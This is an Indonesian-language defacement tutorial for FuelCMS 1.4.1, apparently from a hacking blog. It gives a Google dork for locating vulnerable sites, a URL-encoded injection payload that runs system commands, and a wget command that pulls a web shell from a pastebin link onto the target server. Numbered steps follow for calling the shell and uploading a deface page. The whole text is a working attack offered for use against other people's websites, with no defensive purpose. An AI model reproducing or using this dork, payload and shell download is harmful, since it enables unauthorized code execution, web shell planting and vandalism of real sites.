Deface PoC FuelCMS 1.4.1 - Remote Code Execution

Hai gan, apa kabar kalian semua?
Semoga diberi kesehatan ya gan , Always tersenyum :v jangan sedboy terus .....
Kali ini saya akan memberikan tutorial deface gan, yang heked bey heked bey itu hehe...
Keknya si poc baru gan, tapi gatau ya kalo yang lain mungkin udah ada yang mencobanya....

Google Dork: inurl:/fuel/login/pwd_reset intext:"FUEL CMS"
Exploit : /fuel/pages/select/?filter='%2bpi(print(%24a%3d'system'))%2b%24a('uname -a')%2b'
Command : wget https://pastebin.com/raw/KbxbyS6u -O shell.php

Step by Step :
1. Dorking dahulu gan hehe....

2. Masukkan Exploitnya ke web target, Jika vuln tandanya seperti ini

3. Masukkan exploit tadi dan kalian ubah uname -a dengan wget https://pastebin.com/raw/KbxbyS6u -O shell.php (bisa kalian ubah nama shell.php nya) ntar tampilanya bakalan balik kek waktu masukin exploit tadi

4. Tinggal panggil /namashell.php

5. Lalu upload script deface kalian

Tidak semua target bisa dieksekusi dengan poc ini, kalian harus mengembangkan Dorknya. Setiap PoC itu berbeda beda, jadi ga semuanya bisa dideface. Mungkin segini aja tutorial dari saya, jika terdapat kata atau kalimat yang menyinggung perasaan kalian. Maafkan saya, Jangan Baperan gan hhe :v.
Bantu share yaa